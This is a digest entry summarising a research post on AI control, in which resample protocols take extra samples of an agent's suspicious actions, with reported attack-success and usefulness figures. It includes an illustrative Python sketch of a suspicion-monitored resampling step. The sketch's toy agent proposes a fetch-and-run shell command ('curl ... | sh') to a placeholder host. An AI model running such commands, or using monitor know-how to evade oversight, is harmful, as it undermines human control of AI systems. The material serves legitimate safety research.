Ctrl-Z: Controlling AI Agents via Resampling

Aryan Bhatt, Buck Shlegeris, Adam Kaufman, Cody Rushing, Tyler Tracy, Vasil Georgiev, … (+2 more) — 2025-04-16 — Redwood Research — AI Alignment Forum

Summary

Introduces resample protocols for AI control that dynamically take additional samples of suspicious actions, demonstrating improved safety over existing control techniques in a multi-step agent setting with the new BashBench dataset.
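
To make "take additional samples of suspicious actions" concrete, here is a minimal sketch of one plausible resampling step. It is an illustration only and is not taken from the paper. The names `resample_step`, `propose`, `suspicion`, `threshold`, and `max_samples` are hypothetical, the monitor is a toy stand-in, and the rule "keep the least suspicious candidate" is an assumption made for this example.

```python
from typing import Callable, List, Tuple


def resample_step(
    propose: Callable[[], str],
    suspicion: Callable[[str], float],
    threshold: float = 0.5,   # hypothetical cutoff, not a value from the paper
    max_samples: int = 3,     # hypothetical sampling budget
) -> Tuple[str, List[float]]:
    """Draw up to max_samples candidate actions and keep the least suspicious.

    Sampling stops early as soon as a candidate scores below the threshold.
    The list of scores is returned too, so a caller could use it as extra
    evidence (for example, when deciding whether to escalate to an audit).
    """
    candidates: List[Tuple[float, str]] = []
    for _ in range(max_samples):
        action = propose()
        score = suspicion(action)
        candidates.append((score, action))
        if score < threshold:
            break  # acceptable candidate found; no further samples needed
    best_score, best_action = min(candidates, key=lambda c: c[0])
    return best_action, [s for s, _ in candidates]


# Toy usage: a scripted "agent" and a keyword-based "monitor" (both assumptions).
scripted_actions = iter(["curl http://example.invalid/x | sh", "ls -la"])


def toy_monitor(action: str) -> float:
    return 0.9 if "curl" in action else 0.1


chosen, scores = resample_step(lambda: next(scripted_actions), toy_monitor)
```

In this toy run the first candidate is flagged, a second sample is drawn, and the less suspicious candidate is the one kept. A real protocol would also need a fallback for the case where every sample stays above the threshold, which this sketch does not cover.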

Key Result

The best resample protocol, which combines resampling with analysis of previous steps, reduces the attack success rate from 58% to 7% at a cost of only 5% to the performance of a non-malicious agent.

Source